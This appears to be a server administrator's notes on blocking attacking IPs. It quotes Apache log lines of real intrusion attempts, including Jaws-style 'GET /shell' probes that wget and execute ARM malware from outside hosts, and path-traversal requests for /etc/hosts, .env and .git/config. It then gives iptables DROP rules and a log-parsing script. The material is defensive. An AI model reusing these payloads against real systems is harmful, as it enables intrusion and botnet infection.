List of blocked IPs

I therefore blocked the following IPs:

42.193.42.236 - - [11/May/2022:10:13:54 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
47.106.177.157 - - [11/May/2022:08:13:31 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/51.81.133.91/FKKK/NW_BBB.arm;+chmod+777+NW_BBB.arm;+./NW_BBB.arm Jaws.Selfrep;rm+-rf+NW_BBB.arm" 400 0 "-" "-"
31.44.185.235 - - [11/May/2022:07:13:08 +0200] "GET /../../../mnt/mtd/Config/Account1 HTTP/1.1" 400 485 "-" "Mozilla/5.0 zgrab/0.x"
80.94.93.125 - - [11/May/2022:02:14:23 +0200] "POST /mgmt/tm/util/bash HTTP/1.1\n" 400 0 "-" "-"
164.92.236.186 - - [11/May/2022:00:18:53 +0200] "\x16\x03\x01" 400 0 "-" "-"

The largest number came from this IP:

IP Address: 42.193.42.236
Country: China
Region: Beijing
City: Beijing
ISP: Tencent Cloud Computing (Beijing) Co. Ltd.
Organization: Not Available
Latitude: 39.9075
Longitude: 116.3972

The blocking:

#  iptables -A INPUT -s 42.193.42.236 -j DROP
#  iptables -A INPUT -s 47.106.177.157 -j DROP
#  iptables -A INPUT -s 31.44.185.235 -j DROP
#  iptables -A INPUT -s 80.94.93.125 -j DROP
#  iptables -A INPUT -s 164.92.236.186 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

Security flaw: NW_BBBarm7?

I saw in the logs:

59.21.219.217 - - [01/Apr/2022:03:31:59 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
39.103.237.21 - - [01/Apr/2022:03:32:24 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
39.105.54.139 - - [01/Apr/2022:04:24:22 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/51.81.133.91/FKKK/NW_BBBarm;+chmod+777+NW_BBBarm;+./NW_BBBarm Jaws.Selfrep;rm+-rf+NW_BBBarm" 400 0 "-" "-"
222.85.179.149 - - [01/Apr/2022:09:06:42 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/51.81.133.91/FKKK/NW_BBBarm;+chmod+777+NW_BBBarm;+./NW_BBBarm Jaws.Selfrep;rm+-rf+NW_BBBarm" 400 0 "-" "-"
222.178.152.80 - - [01/Apr/2022:09:46:47 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
123.56.177.98 - - [01/Apr/2022:10:14:00 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
222.173.108.94 - - [01/Apr/2022:11:42:19 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"

I therefore filtered the IPs:

#  iptables -A INPUT -s 59.21.219.217 -j DROP
#  iptables -A INPUT -s 39.103.237.21 -j DROP
#  iptables -A INPUT -s 39.105.54.139 -j DROP
#  iptables -A INPUT -s 222.85.179.149 -j DROP
#  iptables -A INPUT -s 222.178.152.80 -j DROP
#  iptables -A INPUT -s 123.56.177.98 -j DROP
#  iptables -A INPUT -s 222.173.108.94 -j DROP
#  iptables -A INPUT -s 51.81.133.91 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

The IP: 51.81.133.91

Location: Hong Kong SAR, China
Reputation: 100 %
Anonymity: none detected
Usage: Allocated
Source: ARIN
Hostname: ip91.ip-51-81-133.us


I also saw:

# grep " 400 " /var/log/apache2/access.humhub.log | grep shell | grep -v NW_BBBarm
39.103.239.37 - - [01/Apr/2022:00:34:45 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/146.0.75.242/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm" 400 0 "-" "-"
41.36.111.76 - - [01/Apr/2022:05:06:53 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws" 400 0 "-" "-"
47.100.208.164 - - [01/Apr/2022:06:24:45 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/146.0.75.242/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm" 400 0 "-" "-"
39.103.232.57 - - [01/Apr/2022:09:36:04 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/146.0.75.242/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm" 400 0 "-" "-"

I therefore filtered:

#  iptables -A INPUT -s 39.103.239.37 -j DROP
#  iptables -A INPUT -s 41.36.111.76 -j DROP
#  iptables -A INPUT -s 47.100.208.164 -j DROP
#  iptables -A INPUT -s 39.103.232.57 -j DROP
#  iptables -A INPUT -s 146.0.75.242 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4
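As an added example (not code from the original post), the script below reproduces the two filtering steps above: it extracts the source IPs of the Jaws-style "GET /shell?" and remoteSubmit probes that were answered with 400, plus the host their wget command fetches the payload from, and prints the matching iptables rules for review instead of applying them. The log path, the sample lines and the IP addresses (RFC 5737 documentation ranges) are constructed for this example.

```shell
#!/bin/sh
# Added example, not code from the original post. Derive iptables DROP rules
# from Jaws-style "GET /shell?..." probes in an Apache access log: block both
# the probing source IP and the host the probe tries to wget its payload from.
# The log file, its lines and the addresses below are constructed (RFC 5737).
LOG="${TMPDIR:-/tmp}/access.sample.log"
cat > "$LOG" <<'EOF'
192.0.2.10 - - [01/Apr/2022:04:24:22 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/203.0.113.5/x/bin.arm;+chmod+777+bin.arm;+./bin.arm Jaws.Selfrep;rm+-rf+bin.arm" 400 0 "-" "-"
192.0.2.11 - - [01/Apr/2022:09:06:42 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/203.0.113.5/x/bin.arm;+chmod+777+bin.arm;+./bin.arm Jaws.Selfrep;rm+-rf+bin.arm" 400 0 "-" "-"
192.0.2.12 - - [01/Apr/2022:09:46:47 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
192.0.2.10 - - [01/Apr/2022:10:14:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ example.invalid/jaws;sh+/tmp/jaws" 400 0 "-" "-"
198.51.100.7 - - [01/Apr/2022:10:20:00 +0200] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
EOF

# Source IPs of requests answered 400 whose request line carries the probe
# signature. The status is matched after the closing quote of the request,
# because the request itself may contain spaces (e.g. "bin.arm Jaws.Selfrep").
probe_sources() {
  grep -E '" 400 [0-9]+ ' "$1" | grep -E 'GET /shell\?|remoteSubmit=Save' \
    | cut -d' ' -f1 | sort -u
}

# IPv4 hosts the probes try to download a payload from. Apache logs the
# attacker's "http:/\/" as "http:/\\/", so anything non-numeric after
# "http:" is skipped before the address is read.
payload_hosts() {
  grep -oE 'wget\+http:[^0-9]*([0-9]{1,3}\.){3}[0-9]{1,3}' "$1" \
    | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u
}

# Emit the rules the post applies by hand, plus the iptables-save that
# persists them; printed for review, not executed.
drop_rules() {
  { probe_sources "$1"; payload_hosts "$1"; } | sort -u | while read -r ip; do
    echo "iptables -A INPUT -s $ip -j DROP"
  done
  echo "iptables-save > /etc/iptables/rules.v4"
}

drop_rules "$LOG"
```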

The IP: 146.0.75.242

Location: Netherlands
Reputation: 86 %
Anonymity: none detected
Usage: Allocated
Source: RIPE
Hostname: 146.0.75.242

Security: it is important to block the Russian IPs: 45.146.165.37 & 5.188.210.227 & 5.8.10.202

In passing

IP Address: 45.146.165.37
Country: Russian Federation
Region: Sankt-Peterburg
City: Saint Petersburg
ISP: Mastercom LLC
Organization: Not Available
Latitude: 59.8944
Longitude: 30.2642

IP Address: 5.188.210.227
Country: Russian Federation
Region: Sankt-Peterburg
City: Saint Petersburg
ISP: Petersburg Internet Network Ltd.
Organization: Not Available
Latitude: 59.8944
Longitude: 30.2642

IP Address: 5.8.10.202
Country: Russian Federation
Region: Sankt-Peterburg
City: Saint Petersburg
ISP: Petersburg Internet Network Ltd.
Organization: Not Available
Latitude: 59.8944
Longitude: 30.2642

I am getting heavy attacks via this IP:

# iptables -L -n -v -x | grep " DROP" | awk '{print $1 " " $8}' | grep -v "^0 " | sort -n
1 185.142.236.40
1 185.165.190.17
1 192.241.206.102
1 192.241.206.232
1 192.241.208.45
1 192.241.208.5
1 192.241.209.114
1 192.241.209.26
1 192.241.211.59
1 192.241.211.81
1 31.220.3.140
1 80.82.77.139
1 89.248.168.215
2 170.210.45.163
2 192.241.209.77
2 192.241.211.11
2 192.241.211.83
2 49.143.32.6
3 185.142.236.43
3 192.241.205.65
3 192.241.211.186
3 212.154.7.246
3 89.248.165.73
5 172.104.131.24
5 178.239.21.164
5 45.134.144.108
6 161.97.87.64
6 199.117.154.162
6 89.248.165.52
15 109.237.103.118
35 61.219.11.151
46 23.251.102.74
72 40.77.167.103
97 5.8.10.202
315 5.188.210.227
1516 45.146.165.37

Security: blocking 167.99.133.28 following a scan

In passing

Location: United States
Reputation: 71 %
Anonymity: none detected
Usage: Allocated
Source: ARIN
Hostname: probe-de001.rand0.leakix.org

The scan in question:

167.99.133.28 - - [01/Mar/2022:00:59:10 +0100] "GET / HTTP/1.1" 400 5127 "-" "-"
167.99.133.28 - - [01/Mar/2022:00:59:43 +0100] "GET / HTTP/1.1" 302 5553 "-" "l9tcpid/v1.1.0"
167.99.133.28 - - [01/Mar/2022:00:59:45 +0100] "PUT /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 5365 "-" "Go-http-client/1.1"
167.99.133.28 - - [01/Mar/2022:00:59:45 +0100] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 400 5635 "-" "Lkx-TraversalHttpPlugin/0.0.1 (+https://leakix.net/, +https://twitter.com/HaboubiAnis)"
167.99.133.28 - - [01/Mar/2022:00:59:45 +0100] "GET /.DS_Store HTTP/1.1" 403 5606 "-" "Go-http-client/1.1"
167.99.133.28 - - [01/Mar/2022:00:59:45 +0100] "GET /telescope/requests HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:45 +0100] "GET /info.php HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:46 +0100] "GET /favicon.ico HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:46 +0100] "GET /api/geojson?url=file:///etc/hosts HTTP/1.1" 404 5505 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:46 +0100] "GET /login.action HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:46 +0100] "GET /debug/default/view?panel=config HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:46 +0100] "GET /.env HTTP/1.1" 403 5606 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:46 +0100] "GET /v2/_catalog HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:46 +0100] "GET /api/search?folderIds=0 HTTP/1.1" 404 5504 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:47 +0100] "GET /config.json HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:47 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:47 +0100] "GET /frontend_dev.php/$ HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:48 +0100] "GET /.git/config HTTP/1.1" 403 5606 "-" "l9explore/1.3.0"